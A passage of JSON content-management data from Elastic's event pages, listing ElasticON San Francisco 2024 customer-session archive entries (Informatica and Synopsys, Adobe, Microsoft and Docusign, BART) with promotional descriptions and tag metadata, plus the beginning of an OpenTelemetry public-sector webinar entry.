Synopsys","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's Bahubali Shetti, Synopsys's Krissi Yan, and Informatica's Kirti Parida to learn about the state of observability, the benefits of AI-powered solutions, and real-world success stories.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eCurrent state of observability and Elastic’s AI-powered solution\u003c/li\u003e\u003cli\u003eInsights from AI Assistant linked to a local LLM\u003c/li\u003e\u003cli\u003eHow Elastic helped reduce MTTR by 40% at Informatica\u003c/li\u003e\u003cli\u003eThe importance of integrating AI in observability tools\u003c/li\u003e\u003cli\u003eFuture milestones for advancing observability with AI-powered solutions\u003c/li\u003e\u003cli\u003eHow Elastic’s observability tools can support your organization’s needs\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blt19aa6eaf05f480b6","blta8f88f94a1ce89c8","blt9dd2a2375a951bcc"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | Informatica \u0026 Synopsys","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | Informatica \u0026 Synopsys","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:40:15.194Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/informatica-synopsys","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"o92JDfEr4nqnxDrK3dRkZC","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.053Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbf1a84ce72d54061","_version":7,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:32:54.367Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | Adobe","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's Steve Kearns and Adobe's Varsha Chandan and Jordan Moore to explore how the latest platform innovations and AI integration can streamline development and issue diagnosis.\u003c/p\u003e\n\u003ch4\u003eHighlights\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eUncovering how the latest platform innovations simplify building and scaling Elastic solutions\u003c/li\u003e\n \u003cli\u003eLeveraging AI and Elasticsearch to reduce time and costs associated with developer tools\u003c/li\u003e\n \u003cli\u003eDiagnosing issues more efficiently using AI and Elasticsearch\u003c/li\u003e\n \u003cli\u003eThe role of AI in enhancing developer productivity\u003c/li\u003e\n \u003cli\u003eFuture milestones for evolving development tools with AI\u003c/li\u003e\n \u003cli\u003eHow Elastic’s platform innovations support your organization's scaling needs\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\n\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blta88061c105b8011d","blt6d541ad58e5164d9","blt3c68347d16e32c8b"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | Adobe","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | Adobe","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:40:08.694Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/adobe","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"xJCsxzyiRjnD33NJsuBGaP","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.072Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt73fac6c08b06a899","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:37:57.724Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Manny Daniele, Senior Account Technology Strategist at Microsoft, and Hiral Shah, Director of Product Management at Docusign, to explore the value delivered through the partnership between Elastic and Microsoft.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eInsights into how the Elastic-Microsoft partnership benefits Docusign\u003c/li\u003e\u003cli\u003eEnhancing digital workflows at Docusign with advanced technology integration\u003c/li\u003e\u003cli\u003eStrengthening Docusign’s solutions through innovative collaboration\u003c/li\u003e\u003cli\u003eThe importance of strategic alliances in driving technological advancements for Docusign\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blt62a7f7a74a6a5a51","bltbcda328c05f06aec"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | Microsoft \u0026 Docusign","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:38:58.086Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/docusign-microsoft","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"xJCsxzyiRjnD33NJsuBGaP","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.087Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9a24bc96fa3864a5","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:23:57.343Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | BART","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's James Spiteri and BART's Rob McQueen to discover how AI-driven security analytics can enhance alert triaging, data integration, and threat investigations.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eInsights on using AI-driven security analytics to simplify alert triaging, data integration, and investigations\u003c/li\u003e\u003cli\u003eHow Elastic Security has bolstered cybersecurity measures at BART\u003c/li\u003e\u003cli\u003eSecuring AI implementations at BART\u003c/li\u003e\u003cli\u003eDemo of generative AI features on the Elastic Search AI Platform\u003c/li\u003e\u003cli\u003eHow security analysts can detect and remediate threats faster with AI\u003c/li\u003e\u003cli\u003eThe importance of integrating AI in cybersecurity tools to improve efficiency\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blt47281ee31f9b7aa9","blt65bafb0f35c33cef"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | BART","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | BART","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-12T18:38:26.091Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/bay-area-rapid-transit","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"2p8Abt3A9p3edb5hST6Njg","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-13T20:40:19.103Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd40aa17452636611","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-11T21:45:51.363Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Observability in the open: OTel for public sector","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003eAmericas: Thursday, March 13, 2025, at 9 a.m. PDT, 12 p.m. EDT\u003c/p\u003e\u003cp\u003eEurope \u0026amp; India: Thursday, March 13, 2025, at 11 a.m. CET, 3:30 p.m. IST\u003c/p\u003e\u003cp\u003eAsia Pacific: Thursday, March 13, 2025, at 11 a.m. SGT, 2 p.m. AEDT\u003c/p\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eDiscover how OpenTelemetry (OTel) and Elastic are revolutionizing observability and security in the public sector. Learn how OTel's open standards for data collection, processing, and transmission are breaking down the barriers of expensive, vendor-locked tools, offering a flexible and cost-effective solution.\u003c/p\u003e\u003cp\u003eThis must-attend webinar for public sector organizations will provide an overview of OTel, highlight its cost-saving benefits, showcase real-world success stories, and explain how Elastic adds value and reliability via open source technology. Don't miss this chance to enhance your observability and security toolkit!\u003c/p\u003e\u003ch4\u003eHighlights and what you'll learn\u003c/h4\u003e\u003cul\u003e\u003cli\u003eWhat OpenTelemetry is and its impactful relationship with Elastic\u003c/li\u003e\u003cli\u003eHow OTel reduces costs and boosts tool compatibility for public sector organizations\u003c/li\u003e\u003cli\u003eKey considerations for using OTel with backend data storage\u003c/li\u003e\u003cli\u003eReal-world use cases demonstrating OTel's benefits\u003c/li\u003e\u003cli\u003eHow to use OTel for cost reduction and avoiding vendor lock-in\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resource\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/industries/public-sector/opentelemetry-using-elastic\" target=\"_self\"\u003eEbook: OpenTelemetry in the public sector using Elastic\u003c/a\u003e\u003c/p\u003e","presentation_date":"2025-03-13T16:00:00.000Z","presenter":["bltc24362001d8e431b","bltd516a87082210f90"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Observability in the open: OTel for public 